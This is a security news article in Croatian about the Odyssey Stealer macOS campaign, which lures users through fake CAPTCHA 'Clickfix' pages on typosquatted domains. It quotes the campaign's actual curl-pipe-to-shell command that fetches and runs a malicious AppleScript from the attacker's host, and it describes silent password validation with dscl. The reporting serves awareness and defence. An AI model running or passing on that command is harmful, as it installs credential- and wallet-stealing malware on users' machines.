Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a pojavila se, koristeći obmanjive “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova dizajniranih za prikupljanje osjetljivih korisničkih akreditacija i financijskih podataka.
Kampanja iskorištava domene koji su pogrešno upisani, a koji blisko oponašaju legitimne financijske platforme i web stranice Apple App Store-a, stvarajući uvjerljivu fasadu koja zavara korisnike da izvršavaju opasne naredbe na svojim sistemima.
Napad započinje kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne upite za provjeru autentičnosti slične Cloudflare stilu.
Ove naizgled legitimne stranice za verifikaciju upućuju macOS korisnike da kopiraju i lijepe naredbe kodirane u Base64 u svoje terminalne aplikacije kako bi dokazali da nisu roboti.
Nakon izvršenja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja na akreditacije preglednika, kriptovalutne novčanike i osjetljive osobne podatke pohranjene u više aplikacija.
Istraživači Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, redizajniranu verziju prethodno poznatog Poseidon Stealera, koji je sam potekao kao fork AMOS Stealera.
Istraživački tim otkrio je više kontrolnih i zapovjednih panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom smještenom u Rusiji.
Zlonamjerni softver pokazuje jasnu sklonost ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Državama i Europskoj uniji, dok se istodobno upadljivo izbjegavaju žrtve u zemljama Zajednice neovisnih država.
Odyssey Stealer predstavlja zabrinjavajuću evoluciju zlonamjernog softvera usmjerenog na macOS, kombinirajući taktike društvenog inženjerstva sa sofisticiranim tehničkim sposobnostima.
Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznate sigurnosne upite koji se čine kao rutinske procedure provjere autentičnosti.
Napadači su pažljivo izradili svoje distribucijske web stranice kako bi odražavale povjerljive platforme, što detekciju čini posebno izazovnom za neoprezne korisnike.
Mehanizam infekcije zlonamjernog softvera oslanja se na višestupanjski proces koji započinje pogrešnim upisivanjem domena i kulminira sveobuhvatnim kompromitiranjem sistema.
Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih sustava za provjeru autentičnosti CAPTCHA.
Lažni upit prikazuje upute za macOS korisnike za izvršavanje naredbe koja izgleda ovako: curl -s http://odyssey1.to:3333/d?u=October | sh.
Ova naredba dohvaća i izvršava AppleScript sa servera za kontrolu i zapovijedanje napadača. Skript koristi alfanumeričku obskurnost za skrivanje naziva funkcija, iako analiza otkriva njegovu pravu svrhu.
Nakon izvršenja, zlonamjerni softver stvara privremenu strukturu direktorija pomoću naredbe mkdir, posebno uspostavljajući /tmp/lovemrtrump kao svoju operativnu bazu.
AppleScript zatim prikazuje uvjerljiv upit za provjeru autentičnosti dizajniran za hvatanje sistemske lozinke korisnika.
Za tihu validaciju ukradenih akreditacija, koristi naredbu dscl macOS-a s parametrom authonly, osiguravajući da proces provjere autentičnosti ostane skriven od korisnika.
Ova tehnika omogućuje zlonamjernom softveru da potvrdi valjanost lozinke bez pokretanja sistemskih upozorenja ili sumnje korisnika, pokazujući duboko razumijevanje napadača sigurnosnih mehanizama macOS-a.
Sigurnosni stručnjaci otkrili su da napadači koriste dobro poznate stranice za verifikaciju, poput lažnih CAPTCHA promptova, kako bi nagovorili korisnike da pokrenu zlonamjerne naredbe. Ova metoda, nazvana “Clickfix” taktika, učinkovita je jer se oslanja na korisnikovu naviku da ih vidi i povjerenje u njihove poznate obrasce, kao što su prikazane na objavama na platformama poput X (ranije poznat kao Twitter) i u internim izvješćima tvrtki za kibernetičku sigurnost. U ovom specifičnom slučaju, napadači su stvorili web stranice koje izgledaju identično legitimnim sustavima za provjeru autentičnosti, tražeći od korisnika da kopiraju i pokrenu naredbu u svom terminalu pod izgovorom da dokažu da nisu roboti. Ova naredba, kada se izvrši, zapravo dohvaća i pokreće zlonamjerni AppleScript koji je dizajniran za krađu osjetljivih podataka. Ova tehnika je posebno opasna jer manipulira prirodnim ponašanjem korisnika, čineći prijevaru uvjerljivom i lako prihvatljivom, što dovodi do kompromitiranja sustava i krađe podataka, uključujući akreditacije za prijave i financijske podatke.